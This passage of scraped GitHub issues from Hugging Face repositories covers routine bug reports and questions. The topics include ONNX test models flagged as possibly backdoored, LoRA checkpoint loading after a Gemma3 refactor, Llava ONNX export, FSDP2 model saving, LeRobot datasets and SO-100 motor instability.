**test_onnx_stable_diffusion_img2img.py** file, the model **\"hf-internal-testing/tiny-random-OnnxStableDiffusionPipeline\"** is also automatically downloaded, loaded, and executed.\n\nAt the same time, [the first model](https://huggingface.co/ssube/stable-diffusion-x4-upscaler-onnx/tree/main) and the [second model](https://huggingface.co/hf-internal-testing/tiny-random-OnnxStableDiffusionPipeline/tree/main) are **flagged as risky** on the HuggingFace platform. The `model.onnx` files in these models are marked as risky and may trigger **backdoor threats**. 
For certain specific inputs, the backdoor in the models could be activated, effectively altering the model's behavior.\n\n![Image](https://github.com/user-attachments/assets/facaff80-d2ca-45e3-bf94-5698df511dcd)\n\n![Image](https://github.com/user-attachments/assets/45f47a6d-3079-474a-ad52-867d5279261c)\n\n**Related Risk Reports:** [ssube/stable-diffusion-x4-upscaler-onnx risk report](https://protectai.com/insights/models/ssube/stable-diffusion-x4-upscaler-onnx/cc4d9dc5a0d94a8245f15e970ac6be642c7b63cc/overview) and [hf-internal-testing/tiny-random-OnnxStableDiffusionPipeline risk report](https://protectai.com/insights/models/hf-internal-testing/tiny-random-OnnxStableDiffusionPipeline/a42f662ec86a14033aa8894b954225fa07905134/overview)\n\n#### Suggested Repair Methods\n\n1. Replace these models with safer official alternatives, such as `stabilityai/stable-diffusion-x4-upscaler` and `stabilityai/stable-diffusion-2-inpainting` (or other models). If specific functionalities cannot be achieved, you may convert these models to ONNX format and substitute them accordingly.\n2. If replacement is not feasible, please include a warning about potential security risks when instantiating the relevant classes.\n3. Visually inspect the model using OSS tools like Netron. If no issues are found, report the false threat to the scanning platform.\n\nAs one of the most popular machine learning libraries (**29.4k stars**), **every potential risk could be propagated and amplified**. Could you please address the above issues?\n\nThanks for your help~\n\nBest regards,\nRockstars", "url": "https://github.com/huggingface/diffusers/issues/11762", "state": "open", "labels": [ "bug" ], "created_at": "2025-06-20T09:31:50Z", "updated_at": "2025-06-23T05:25:22Z", "comments": 2, "user": "Rockstar292" }, { "repo": "huggingface/transformers", "number": 38927, "title": "Can't load my LoRA checkpoint after gemma3 refactor", "body": "### System Info\n\n- `transformers` version: 4.52.4\n- Platform: Linux-6.8.0-1029-aws-x86_64-with-glibc2.35\n- Python version: 3.10.15\n- Huggingface_hub version: 0.32.2\n- Safetensors version: 0.4.3\n- Accelerate version: 1.6.0\n- Accelerate config: \tnot found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: yes but not relevant here, it happens on single gpu too\n- Using GPU in script?: yes but same error on cpu only\n- GPU type: NVIDIA L40S\n\n### Who can help?\n\nHi @ArthurZucker and @zucchini-nlp \n\nI am using my own implementation of `Gemma3ForConditionalGeneration`. I was using transformers 4.50 for a while and upgraded to 4.52.4. After the update I realised that the `Gemma3ForConditionalGeneration` implementation had changed. 
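(A workaround I'm currently testing, in case others hit this: rewriting the keys in the saved adapter to the new layout before loading — a sketch, with the old/new prefixes inferred from the rename described below and from the warning message; paths are hypothetical:)\n\n```python\nfrom safetensors.torch import load_file, save_file\n\n# rewrite old-layout adapter keys to the new layout before PeftModel.from_pretrained\nstate = load_file(\"old_adapter/adapter_model.safetensors\")\nstate = {k.replace(\"base_model.model.language_model.model.\",\n                   \"base_model.model.model.language_model.\"): v\n         for k, v in state.items()}\nsave_file(state, \"new_adapter/adapter_model.safetensors\")\n```\n\n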
Mostly, `self.language_model` became `self.model`.\n\nThe issue is that when I use `PeftModel.from_pretrained` on my old LoRA checkpoint, it can't find the weights and I get a bunch of\n```\nFound missing adapter keys while loading the checkpoint: ['base_model.model.model.language_model.layers.0.self_attn.q_proj.lora_A.default.weight', 'base_model.model.model.language_model.layers.0.self_attn.q_proj.lora_B.default.weight', ...\n```\nI thought the `_checkpoint_conversion_mapping` [attribute](https://github.com/huggingface/transformers/blob/v4.52.4/src/transformers/models/gemma3/modeling_gemma3.py#L1236) would be enough, but it isn't. Is there an easy way I can still use my old checkpoint?\n\nThanks in advance for your help, I really appreciate all the effort you guys make, and sorry if this was explained somewhere in the documentation!\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nI have a custom Gemma class:\n```python\nclass MyCustomiGemma(Gemma3ForConditionalGeneration):\n    _checkpoint_conversion_mapping = {\n        \"^language_model.model\": \"model.language_model\",\n        \"^vision_tower\": \"model.vision_tower\",\n        \"^multi_modal_projector\": \"model.multi_modal_projector\",\n        \"^language_model.lm_head\": \"lm_head\",\n    }\n\n    def __init__(\n        self,\n        config: Gemma3Config,\n    ):\n        super().__init__(config)\n\n        self.vocab_size = config.text_config.vocab_size\n\n        self.model = Gemma3Model(config)\n        self.lm_head = nn.Linear(\n            config.text_config.hidden_size, config.text_config.vocab_size, bias=False\n        )\n\n        self.another_head = nn.Linear(...)\n\n        self.post_init()\n```\n\nWhen using:\n```python\nbase_model = MyCustomiGemma.from_pretrained()\nmodel = PeftModel.from_pretrained(\n    base_model,\n    checkpoint_path,\n    is_trainable=True,\n)\n```\n\nI get the `Found missing adapter keys while loading the checkpoint:` warning for all my LoRAs.\n\n### Expected behavior\n\nI think the issue is just a name mapping, and I thought it would be backwards compatible.", "url": "https://github.com/huggingface/transformers/issues/38927", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-20T06:59:34Z", "updated_at": "2025-10-07T18:53:15Z", "comments": 12, "user": "jood-canva" }, { "repo": "huggingface/mcp-course", "number": 119, "title": "How to preview the project locally?", "body": "I'm trying to preview the project locally to see my changes and contribute to the project. But when executing the script, the following error is triggered.\n\nError:\n![Image](https://github.com/user-attachments/assets/b9a47af1-e28e-4175-8c33-7ed2aac9121b)\n\nPreview:\n![Image](https://github.com/user-attachments/assets/2b140628-485f-4bd3-bc26-f3b083ae92de)\n\nIs there a correct way to run and preview the project?", "url": "https://github.com/huggingface/mcp-course/issues/119", "state": "closed", "labels": [], "created_at": "2025-06-20T01:05:46Z", "updated_at": "2025-09-23T17:29:13Z", "user": "arimariojesus" }, { "repo": "huggingface/transformers", "number": 38924, "title": "Exporting Llava decoder into ONNX format", "body": "I am working on exporting Llava into ONNX format. I came across this previous issue: https://github.com/huggingface/transformers/issues/33637 which had a notebook that outlined how to export in three separate parts. I noticed there wasn't any actual code showing how the decoder was exported, unlike the other two components. 
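(In case a sketch helps the discussion: the way I would *expect* the decoder part to be exported — not necessarily what the notebook actually did — is to wrap the language model so it takes `inputs_embeds`, since that's what the multimodal projector produces. `model` below is a `LlavaForConditionalGeneration`; KV-cache inputs are omitted for brevity:)\n\n```python\nimport torch\n\nclass DecoderWrapper(torch.nn.Module):\n    \"\"\"Expose the LLaVA language model as a single-input module for ONNX export.\"\"\"\n    def __init__(self, language_model):\n        super().__init__()\n        self.language_model = language_model\n\n    def forward(self, inputs_embeds):\n        return self.language_model(inputs_embeds=inputs_embeds).logits\n\nwrapper = DecoderWrapper(model.language_model).eval()\ndummy_embeds = torch.randn(1, 16, model.config.text_config.hidden_size)\ntorch.onnx.export(\n    wrapper,\n    (dummy_embeds,),\n    \"llava_decoder.onnx\",\n    input_names=[\"inputs_embeds\"],\n    output_names=[\"logits\"],\n    dynamic_axes={\"inputs_embeds\": {0: \"batch\", 1: \"sequence\"}},\n)\n```\n\n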
Does anyone know how they were able to export the decoder in the original notebook?\n\nNotebook: https://colab.research.google.com/drive/1IhC8YOV68cze0XWGfuqSclnVTt_FskUd?usp=sharing", "url": "https://github.com/huggingface/transformers/issues/38924", "state": "closed", "labels": [], "created_at": "2025-06-19T23:32:47Z", "updated_at": "2025-08-12T08:03:14Z", "comments": 10, "user": "EricJi150" }, { "repo": "huggingface/transformers", "number": 38918, "title": "Lack of IDE-Specific Authentication Instructions in Hugging Face \"Quickstart\" Documentation", "body": "Explanation:\n\nI\u2019m currently exploring the Transformers library and want to understand its architecture in order to make meaningful contributions. I started with the Quickstart page, particularly the setup section, which provides instructions for getting started with the Hugging Face Hub.\n\nHowever, I noticed that the documentation appears to be primarily tailored for users working in Jupyter notebooks. The instructions for authentication (using notebook_login()) seem to assume that the user is running code within a notebook environment. As someone who is working in PyCharm (and possibly others working in VS Code or other IDEs), I found that there is no clear guidance for authenticating via these IDEs.\n\nIt would be helpful to explicitly mention how users working in an IDE like PyCharm or VS Code should authenticate. Specifically, using huggingface-cli for authentication in a non-notebook environment could be a good solution. Providing a simple, clear guide on how to authenticate via the CLI or within the IDE would greatly improve the documentation.\n\nSuggestion:\n\nI recommend updating the documentation to include a section specifically addressing authentication when working in IDEs like PyCharm or VS Code. 
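For example, the section could simply point at the two standard non-notebook flows, both of which exist today: running `huggingface-cli login` in the IDE's integrated terminal, or authenticating programmatically:\n\n```python\nfrom huggingface_hub import login\n\n# prompts for a token in the terminal; alternatively pass login(token=\"hf_...\")\n# or set the HF_TOKEN environment variable in the IDE's run configuration\nlogin()\n```\n\n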
\n\nPlease let me know if this suggestion makes sense or if you need any further clarification before I proceed with the update.\n", "url": "https://github.com/huggingface/transformers/issues/38918", "state": "closed", "labels": [], "created_at": "2025-06-19T17:16:32Z", "updated_at": "2025-06-24T18:48:17Z", "comments": 4, "user": "marcndo" }, { "repo": "huggingface/datasets", "number": 7627, "title": "Creating a HF Dataset from lakeFS with S3 storage takes too much time!", "body": "Hi,\n\nI'm new to HF Datasets, and I tried to create datasets based on data versioned in **lakeFS** _(**MinIO** S3 bucket as storage backend)_.\n\nHere I'm using ±30,000 PIL images from the MNIST data; however, it is taking around 12 min to execute, which is a lot!\n\nFrom what I understand, it is loading the images into the cache and then building the dataset.\n– Please find below the execution screenshot –\n\nIs there a way to optimize this, or am I doing something wrong?\n\nThanks!\n\n![Image](https://github.com/user-attachments/assets/c79257c8-f023-42a9-9e6f-0898b3ea93fe)", "url": "https://github.com/huggingface/datasets/issues/7627", "state": "closed", "labels": [], "created_at": "2025-06-19T14:28:41Z", "updated_at": "2025-06-23T12:39:10Z", "comments": 1, "user": "Thunderhead-exe" }, { "repo": "huggingface/lerobot", "number": 1351, "title": "Need help with dataset and training.", "body": "# What is this for\n\nAttracted by SmolVLA and new to smolvla_base, I'd like to ask a few questions before trying this model.\n\nSeveral parts: \n1) dataset\n2) simulation\n3) real world\n\n## Dataset\n### Two cameras?\nI have read three datasets, including \nhttps://huggingface.co/datasets/lerobot/svla_so101_pickplace\nhttps://huggingface.co/datasets/Marlboro1998/starai02\n\nand their structure shows: \nvideos/chunks/ contains two folders with .mp4 files, one per camera.\n\nhttps://huggingface.co/datasets/unitreerobotics/Z1_DualArmStackBox_Dataset\n\nI find that the data in the Unitree dataset comes with only one camera.\n\nDoes this mean that two cameras are not strictly necessary? \n\n**If one camera** is enough to build a dataset: where and how should I change the code to build the dataset and train with it? \n\n**If two cameras are the minimum requirement**: is it possible to place them somewhat freely, e.g. one in-hand and one somewhere else? It might be hard to physically put a camera in exactly the same position every time (for some tasks).\n\n### Depth data?\nI have one RealSense camera with depth data. How should I handle it in the dataset? Should I only use the color frames?\n\n### Video length\nI have watched several videos in svla_so101_pickplace, and each is about 10 s long. I understand that this is because such a short video contains one complete task. \n\nWhat about a task that is long and complex? Should I break it down into n parts, so I get n + 1 tasks (the parts plus the full task), and then train with that?\n\n\n## Simulation\n\n### Simulation env\nI have some basic understanding in this part; I have used MuJoCo and Isaac Sim a few times and am just starting to try lerobot. \n\nIs it possible to connect to MuJoCo or Isaac Sim? I understand these two might not be related to lerobot; sorry if anything is wrong.\n\n### Simulation of a different robot\nThis is something relating to training. How can I record a dataset for a custom robot? 
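(For the real-robot case, this is the recording entry point I've found — flags copied from the docs for the SO-10x arms, so they may differ for other robots or lerobot versions:)\n\n```bash\npython -m lerobot.record \\\n    --robot.type=so101_follower \\\n    --robot.port=/dev/ttyACM0 \\\n    --robot.id=my_follower \\\n    --teleop.type=so101_leader \\\n    --teleop.port=/dev/ttyACM1 \\\n    --teleop.id=my_leader \\\n    --dataset.repo_id=${HF_USER}/my_dataset \\\n    --dataset.num_episodes=5 \\\n    --dataset.single_task=\"Pick up the cube\"\n```\n\n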
I have looked at some datasets, such as the Unitree ones, but how do I record in simulation and with a custom robot?\n\nI have not yet read the lerobot documentation in depth, so if there is any doc that can help with this, could you share some information?\n\n\n# Real world\n\nIf I try to train with a different robot but with only a small dataset (because there is less community data and self-collected data), I think its performance would not be as good as the results in your paper. How much data do you think is necessary for such a situation (a robot different from the paper)?\n\n\nThanks a lot for your consideration. Forgive me if anything is wrong in my text above.\n\n", "url": "https://github.com/huggingface/lerobot/issues/1351", "state": "closed", "labels": [ "question", "policies", "dataset" ], "created_at": "2025-06-19T04:03:43Z", "updated_at": "2025-10-17T11:47:56Z", "user": "hbj52152" }, { "repo": "huggingface/candle", "number": 2997, "title": "Implement Conv3D support for compatibility with Qwen-VL and similar models", "body": "Several vision-language models such as Qwen-VL and its variants make use of 3D convolution layers (Conv3D) in their architecture, especially for handling video or temporal spatial data. Currently, Candle does not support Conv3D operations, which makes it impossible to run or port such models natively.\n\nIn order to support these models and ensure broader compatibility with existing open-source architectures, it would be beneficial to implement Conv3D in Candle as a fundamental operation.\n\nThis will enable:\n\n- Native execution of Qwen-VL-style models\n- Proper handling of video or spatio-temporal data inputs\n- Compatibility with pretrained weights relying on Conv3D layers\n\nLooking forward to discussion and suggestions on how best to approach this implementation.\n", "url": "https://github.com/huggingface/candle/issues/2997", "state": "open", "labels": [], "created_at": "2025-06-19T02:57:20Z", "updated_at": "2025-10-10T16:51:20Z", "comments": 1, "user": "maximizemaxwell" }, { "repo": "huggingface/accelerate", "number": 3633, "title": "How to save a model with FSDP2?", "body": "Hello everyone, I'm confused about how to save model weights using FSDP2. I keep running into OOM (out-of-memory) issues when trying to save a trained 8B model with FSDP2. 
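(Update: the direction I'm exploring, in case it's relevant to the answer — since my config sets `fsdp_state_dict_type: SHARDED_STATE_DICT`, my understanding is that `accelerator.save_state` writes one shard per rank without gathering, whereas `accelerator.save_model` gathers a full state dict; a sketch of what I mean, to be confirmed:)\n\n```python\n# sharded checkpoint: each rank saves only what it owns (my understanding)\naccelerator.wait_for_everyone()\naccelerator.save_state(\"./saved_models/tmp_sharded\")\n```\n\n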
Interestingly, memory is sufficient during training, but saving the model requires too much memory.\n\nI would like each rank to save only its own weights (maybe the OOM issue doesn't occur in this case?).\n\nI'm using 8 A100-40GB GPUs, and I'd really appreciate your help.\n\nHere is my env:\n```text\naccelerate==1.7.0\ntorch==2.6.0+cu12.6\ntransformers==4.52.4\n```\n\nThis is my accelerate config (FSDP2.yaml):\n```yaml\ncompute_environment: LOCAL_MACHINE\ndebug: false\ndistributed_type: FSDP\ndowncast_bf16: 'no'\nenable_cpu_affinity: false\nfsdp_config:\n  fsdp_activation_checkpointing: false\n  fsdp_auto_wrap_policy: TRANSFORMER_BASED_WRAP\n  fsdp_cpu_ram_efficient_loading: true\n  fsdp_offload_params: false\n  fsdp_reshard_after_forward: true\n  fsdp_state_dict_type: SHARDED_STATE_DICT\n  fsdp_version: 2\nmachine_rank: 0\nmain_training_function: main\nmixed_precision: bf16\nnum_machines: 1\nnum_processes: 8\nrdzv_backend: static\nsame_network: true\ntpu_env: []\ntpu_use_cluster: false\ntpu_use_sudo: false\nuse_cpu: false\n```\n\nMy script (demo.py):\n```python\nimport os\nimport os.path as osp\n\nimport torch\nimport torch.nn as nn\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\n\nfrom accelerate import Accelerator\n\nclass Mydataset(torch.utils.data.Dataset):\n    def __init__(self, data_length=32, tokenizer=None):\n        super().__init__()\n        self.data_length = data_length\n        self.tokenizer = tokenizer\n        self.input_str = 'this is a test'\n        self.data = tokenizer(self.input_str, return_tensors='pt', padding='max_length', max_length=32, padding_side='right')\n\n    def __len__(self):\n        return 10\n\n    def __getitem__(self, idx):\n        return {\n            'input_ids': self.data['input_ids'][0],\n            'attention_mask': self.data['attention_mask'][0]\n        }\n\n\nif __name__ == '__main__':\n\n    accelerator = Accelerator()\n    model_path = \"./pretrain/Qwen3-8B\"\n\n    model = AutoModelForCausalLM.from_pretrained(model_path, trust_remote_code=True)\n    tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)\n\n    optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)\n\n    dataset = Mydataset(tokenizer=tokenizer)\n    dataloader = torch.utils.data.DataLoader(dataset, batch_size=16, shuffle=True)\n\n    model, optimizer, dataloader = accelerator.prepare(model, optimizer, dataloader)\n\n    loss_func = torch.nn.CrossEntropyLoss()\n\n    model.train()\n    # training\n    for batch in dataloader:\n        input_ids = batch['input_ids']\n        attention_mask = batch['attention_mask']\n        labels = batch['input_ids'].clone()\n\n        outputs = model(input_ids=input_ids, attention_mask=attention_mask)\n\n        labels = nn.functional.pad(labels, (0, 1), value=-100)\n        shift_labels = labels[..., 1:].contiguous().view(-1)\n\n        accelerator.wait_for_everyone()\n        loss = loss_func(outputs.logits.view(-1, outputs.logits.shape[-1]), shift_labels)\n        accelerator.backward(loss)\n\n        optimizer.step()\n        optimizer.zero_grad()\n\n    print(\"training finished\")\n    model.eval()\n    model_save_path = \"./saved_models/tmp\"\n\n    accelerator.save_model(model, model_save_path)\n    print(\"Done\")\n```\n\nCommand:\n```bash\naccelerate launch --config_file ./accelerate_configs/FSDP2.yaml demo.py\n```\n", "url": "https://github.com/huggingface/accelerate/issues/3633", "state": "closed", "labels": [], "created_at": "2025-06-18T11:41:05Z", "updated_at": "2025-06-18T15:36:37Z", "user": "colinzhaoxp" }, { "repo": "huggingface/datasets", "number": 7624, "title": "#Dataset Make \"image\" column appear first in dataset preview UI", "body": "Hi!\n\n#Dataset\n\nI'm currently 
uploading a dataset that includes an `\"image\"` column (PNG files), along with some metadata columns. The dataset is loaded from a .jsonl file. My goal is to have the \"image\" column appear as the first column in the dataset card preview UI on the :hugs: Hub.\n\nHowever, at the moment, the `\"image\"` column is not the first\u2014in fact, it appears last, which is not ideal for the presentation I\u2019d like to achieve.\n\nI have a couple of questions:\n\nIs there a way to force the dataset card to display the `\"image\"` column first?\nIs there currently any way to control or influence the column order in the dataset preview UI?\nDoes the order of keys in the .jsonl file or the features argument affect the display order?\nThanks again for your time and help! :blush:", "url": "https://github.com/huggingface/datasets/issues/7624", "state": "closed", "labels": [], "created_at": "2025-06-18T09:25:19Z", "updated_at": "2025-06-20T07:46:43Z", "comments": 2, "user": "jcerveto" }, { "repo": "huggingface/agents-course", "number": 550, "title": "[QUESTION] Diagram of the multi-agent architecture", "body": "[Unit 2.1 Multi-Agent Systems](https://huggingface.co/learn/agents-course/unit2/smolagents/multi_agent_systems#multi-agent-systems) contains [an image](https://mermaid.ink/img/pako:eNp1kc1qhTAQRl9FUiQb8wIpdNO76eKubrmFks1oRg3VSYgjpYjv3lFL_2hnMWQOJwn5sqgmelRWleUSKLAtFs09jqhtoWuYUFfFAa6QA9QDTnpzamheuhxn8pt40-6l13UtS0ddhtQXj6dbR4XUGQg6zEYasTF393KjeSDGnDJKNxzj8I_7hLW5IOSmP9CH9hv_NL-d94d4DVNg84p1EnK4qlIj5hGClySWbadT-6OdsrL02MI8sFOOVkciw8zx8kaNspxnrJQE0fXKtjBMMs3JA-MpgOQwftIE9Bzj14w-cMznI_39E9Z3p0uFoA?type=png) depicting a diagram of the multi-agent architecture. In this image, the Manager Agent, which is typically responsible for task delegation, has direct access to a Code-Interpreter Tool. Would it be more reasonable in practice if there was a Code-Interpreter Agent between them?\n\n![Image](https://github.com/user-attachments/assets/02ce537b-c9b8-4a4d-9681-578688787c2d)", "url": "https://github.com/huggingface/agents-course/issues/550", "state": "open", "labels": [ "question" ], "created_at": "2025-06-18T08:58:58Z", "updated_at": "2025-06-18T08:58:58Z", "user": "st143575" }, { "repo": "huggingface/lerobot", "number": 1337, "title": "how to work with ur robot,and collect the data and fine turn the model ?", "body": "", "url": "https://github.com/huggingface/lerobot/issues/1337", "state": "closed", "labels": [ "question", "policies", "dataset" ], "created_at": "2025-06-17T09:51:16Z", "updated_at": "2025-10-17T11:49:17Z", "user": "mmlingyu" }, { "repo": "huggingface/diffusers", "number": 11730, "title": "Add `--lora_alpha` and metadata handling in training scripts follow up", "body": "With #11707, #11723 we pushed some small changes to the way we save and parse metadata for trained LoRAs, which also allow us to add a `--lora_alpha` arg to the Dreambooth LoRA training scripts, making LoRA alpha also configurable. 
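For reference, in the scripts that were already updated the change looks roughly like this (a sketch; exact argument wording can differ per script):\n\n```python\nparser.add_argument(\n    \"--lora_alpha\",\n    type=int,\n    default=4,\n    help=\"LoRA alpha to be used for additional scaling.\",\n)\n\n# ...and where the adapter config is built:\ntransformer_lora_config = LoraConfig(\n    r=args.rank,\n    lora_alpha=args.lora_alpha,\n    init_lora_weights=\"gaussian\",\n    target_modules=[\"to_k\", \"to_q\", \"to_v\", \"to_out.0\"],\n)\n```\n\n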
\n\nThis issue is to ask for help from the community to bring these changes to the other training scripts.\nSince this is an easy contribution, let's try to leave this issue for beginners and people that want to start learning how to contribute to open source projects \ud83e\udd17\n\nUpdating list of scripts to contribute to: \n\n- [ ] [train_dreambooth_lora_sdxl_advanced](https://github.com/huggingface/diffusers/blob/main/examples/advanced_diffusion_training/train_dreambooth_lora_sdxl_advanced.py)\n- [x] [train_dreambooth_lora_sdxl](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sdxl.py)\n- [x] [train_dreambooth_lora_sd3](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sd3.py)\n- [x] [train_dreambooth_lora_sana](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sana.py)\n- [ ] [train_dreambooth_lora_lumina2](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_lumina2.py)\n- [x] [train_dreambooth_lora_hidream](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_hidream.py)\n- [ ] [train_dreambooth_lora](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora.py)\n\nIf you want to contribute just answer to this issue with the one you want to do and tag me in the PR. Please only take one so we can use this opportunity for people to learn the ropes on how to contribute and get started with open source.\ncc: @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/11730", "state": "closed", "labels": [ "good first issue", "contributions-welcome" ], "created_at": "2025-06-17T09:29:24Z", "updated_at": "2025-06-24T10:58:54Z", "comments": 8, "user": "linoytsaban" }, { "repo": "huggingface/trl", "number": 3605, "title": "How to convert my multiturn dialogue dataset\uff1f", "body": "I have created a multiturn dialogue dataset. During the training process, the assistant's reply needs to be based on the user's reply and historical records in the previous round. First, the user's reply is labeled, and then the corresponding reply sentence is generated. In other words, the assistant's reply needs to rely on the previous multi-round dialogue data, and the reward function is based on the label prediction and reply sentence of the current round of reply. 
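(To make the question concrete, the framing I'm considering is to expand each conversation into one example per assistant turn, along these lines — my own sketch, not necessarily the intended TRL format:)\n\n```python\ndef expand_dialogue(messages):\n    \"\"\"One training example per assistant turn; all preceding turns form the prompt.\"\"\"\n    examples = []\n    for i, message in enumerate(messages):\n        if message[\"role\"] == \"assistant\":\n            examples.append({\"prompt\": messages[:i], \"completion\": [message]})\n    return examples\n```\n\n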
How should this kind of dataset be handled?\n\n#### Example\n{'role': 'user', 'content': \"hello, doctor, I can't sleep well\"},\n{'role': 'assistant', 'content': \"userstate: sleep problems | useremotion: | response: Is it trouble falling asleep or poor sleep quality?\"},\n{'role': 'user', 'content': \"All\"},\n{'role': 'assistant', 'content': \"userstate: sleep problems | useremotion: irritable | assistant-strategy: Ask for details | response: How long has it lasted?\"},\n{'role': 'user', 'content': \"About two months\"},\n......\n\nUsing a single round of user input alone cannot determine the user's state and emotions. But I hope that in each round of user response, the output of the assistant will be evaluated.\n", "url": "https://github.com/huggingface/trl/issues/3605", "state": "closed", "labels": [ "🏋 Reward" ], "created_at": "2025-06-17T09:07:47Z", "updated_at": "2025-09-22T17:46:35Z", "user": "Miaoqinghong" }, { "repo": "huggingface/lerobot", "number": 1333, "title": "SO-100 Follower: Severe wrist_roll motor instability causing unwanted rotation during teleoperation", "body": "## Problem Description\n\nThe SO-100 Follower robot arm experiences severe instability in the `wrist_roll` motor during teleoperation, causing unwanted and uncontrollable rotation that significantly impacts usability. The motor exhibits extreme sensitivity and appears to be completely out of control in the default configuration.\n\n## Environment\n\n- **Robot**: SO-100 Follower\n- **LeRobot Version**: [Current version]\n- **Hardware**: Feetech STS3215 servos\n- **OS**: macOS\n- **Python**: 3.10.4\n\n## Quantitative Analysis\n\n### Baseline Analysis (Default Configuration)\n\n- **Data Collection**: 416.5 seconds, 24,894 data points\n- **Standard Deviation**: **95.596** (extremely high)\n- **Large Changes (>10.0)**: **242 occurrences**\n- **Value Distribution**:\n  - Small values (|x|<5.0): **0%**\n  - Large values (|x|≥10.0): **100%** (completely uncontrolled)\n\n### Motor Correlation Analysis\n\nStrong correlations with other motors suggest cross-coupling issues:\n\n1. **elbow_flex.pos**: -0.253 (negative correlation, highest impact)\n2. **shoulder_lift.pos**: 0.203 (positive correlation)\n3. **gripper.pos**: 0.167 (positive correlation)\n4. **shoulder_pan.pos**: 0.124 (weak positive correlation)\n5. **wrist_flex.pos**: 0.026 (minimal correlation)\n\n### Trigger Pattern Analysis\n\nWhen wrist_roll experiences large changes (242 instances), average changes in other motors:\n\n- **elbow_flex.pos**: 1.970 (highest trigger)\n- **wrist_flex.pos**: 2.092\n- **shoulder_lift.pos**: 1.119\n- **gripper.pos**: 0.585\n- **shoulder_pan.pos**: 0.426\n\n## Root Cause Investigation\n\n### 1. Motor Configuration Issues\n\n- Default P_Coefficient (16) appears too high for wrist_roll motor\n- No deadzone filtering in default configuration\n- Potential hardware-level noise or mechanical coupling\n\n### 2. Cross-Motor Interference\n\n- Strong negative correlation with elbow_flex suggests mechanical or electrical interference\n- Movement of other motors triggers unwanted wrist_roll rotation\n\n### 3. Control System Sensitivity\n\n- Motor responds to minimal input changes\n- No built-in filtering for noise or small movements\n\n## Reproduction Steps\n\n1. Set up SO-100 Follower with default configuration\n2. 
Run teleoperation:\n ```bash\n python -m lerobot.teleoperate \\\n --robot.type=so100_follower \\\n --robot.port=/dev/tty.usbserial-130 \\\n --robot.id=blue \\\n --teleop.type=so100_leader \\\n --teleop.port=/dev/tty.usbserial-110 \\\n --teleop.id=blue\n ```\n3. Move any other motor (especially elbow_flex)\n4. Observe unwanted wrist_roll rotation\n\n## Attempted Solutions and Results\n\n### 1. P Coefficient Reduction\n\n**Implementation**: Reduced wrist_roll P_Coefficient from 16 to 4\n**Result**: Improved standard deviation from 95.596 to 59.976 (37.3% improvement)\n\n### 2. Deadzone Filtering\n\n**Implementation**: Added deadzone threshold (5.0) to ignore small changes\n**Result**: Partial improvement but problem persists\n\n### 3. Advanced Filtering System\n\n**Implementation**: Created comprehensive filtering with:\n\n- Moving average filter\n- Gripper-linked filter\n- Combined filtering modes\n **Result**: Reduced responsiveness but didn't eliminate core issue\n\n### 4. Complete Disabling (Workaround)\n\n**Implementation**: Force wrist_roll value to 0.0 at all times\n**Result**: Eliminates problem but removes wrist_roll functionality\n\n## Proposed Solutions\n\n### Short-term (Workarounds)\n\n1. **Lower P Coefficient**: Further reduce to 2 or 1\n2. **Stronger Deadzone**: Increase threshold to 20.0+\n3. **Motor Disabling**: Provide option to disable problematic motors\n\n### Long-term (Root Cause Fixes)\n\n1. **Hardware Investigation**: Check for:\n\n - Cable interference/noise\n - Mechanical coupling between joints\n - Motor calibration issues\n - Power supply stability\n\n2. **Software Improvements**:\n\n - Adaptive filtering based on motor correlations\n - Cross-motor interference compensation\n - Better default configurations for SO-100\n\n3. **Configuration Options**:\n - Motor-specific P/I/D coefficients\n - Built-in filtering options\n - Hardware-specific presets\n\n## Additional Data Available\n\nI have collected extensive analysis data including:\n\n- Multiple log files with quantitative measurements\n- Correlation analysis scripts and results\n- Visualization graphs showing the problem\n- Working implementations of various filtering approaches\n\n## Impact\n\nThis issue severely impacts the usability of SO-100 Follower robots for:\n\n- Teleoperation tasks\n- Data collection for machine learning\n- Precise manipulation requirements\n\nThe problem appears to be systemic rather than isolated to individual units, suggesting a configuration or design issue that affects the SO-100 platform generally.\n\n## Request for Assistance\n\nGiven the complexity of this issue and its impact on SO-100 usability, I would appreciate:\n\n1. Guidance on hardware-level debugging approaches\n2. Insights from other SO-100 users experiencing similar issues\n3. Potential firmware or configuration updates\n4. Recommendations for permanen", "url": "https://github.com/huggingface/lerobot/issues/1333", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-06-17T07:10:23Z", "updated_at": "2025-12-05T12:17:16Z", "user": "TKDRYU104" }, { "repo": "huggingface/safetensors", "number": 624, "title": "Interest in Parallel Model Training and Xformers Saving Support (Bug?) (SOLVED)", "body": "### Feature request\n\nI would like to request official support for xformers (link: https://github.com/facebookresearch/xformers) and parallel model training: https://huggingface.co/docs/transformers/v4.13.0/en/parallelism for the safetensor saving file format if this does not currently exist. 
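For context, the saving pattern I expected to work is roughly the following (a sketch under my own assumptions, where `model` stands for the torch module being trained; it gathers a plain CPU state dict in one process before handing it to safetensors):\n\n```python\nimport torch.distributed as dist\nfrom safetensors.torch import save_file\n\n# Sketch: save_file expects ordinary tensors that all live in one process,\n# so materialize a CPU copy of the weights and write from rank 0 only.\nstate_dict = {k: v.detach().cpu().contiguous() for k, v in model.state_dict().items()}\nif not dist.is_initialized() or dist.get_rank() == 0:\n    save_file(state_dict, \"model.safetensors\")\n```\n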
